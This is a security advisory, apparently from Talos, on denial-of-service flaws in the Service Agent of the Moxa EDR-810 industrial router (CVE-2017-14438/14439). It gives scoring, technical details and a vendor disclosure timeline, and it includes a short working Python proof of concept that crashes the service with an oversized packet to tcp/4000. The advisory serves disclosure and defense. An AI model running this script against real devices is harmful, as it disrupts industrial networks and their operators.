Moxa EDR-810 Service Agent Multiple Denial of Service Vulnerabilities(CVE-2017-14438 - CVE-2017-14439)

Summary

Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp and 4001/tcp to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

https://www.moxa.com/product/EDR-810.htm

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation

Details

The Moxa EDR Service Agent listens on port 4000 (tcp/udp) and 4001 (tcp). Moxa MXconfig, a Windows program, interacts with the EDR via the ServiceAgent. Sending large amounts of random data to these ports causes a crash.

CVE-2017-14438 - Crash on Port 4000

In order to crash port 4000 (both TCP & UDP) a large packet needs to be sent to tcp/4000. This causes a consistent crash.

Port 4001

In order to crash port 4001 a large packet needs to be sent to tcp/4001. The crash does not always occur on the first try so an attacker may need to run this attack multiple times in order to cause a crash.

Exploit Proof-of-Concept

This python script will crash the Service Agent

import socket
host = '192.168.127.254'
port = 4000
packet = "\x00" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(packet)
data = s.recv(1024)
s.close

Timeline

• 2017-11-30 - Vendor Disclosure
• 2017-12-04 - Vendor Acknowledged
• 2017-12-25 - Vendor provided timeline for fix (Feb 2018)
• 2018-01-04 - Timeline pushed to mid-March per vendor
• 2018-03-24 - Talos follow up with vendor for release timeline
• 2018-03-26 - Timeline pushed to 4/13/18 per vendor
• 2018-04-12 - Vendor patched & published new firmware on website
• 2018-04-13 - Public Release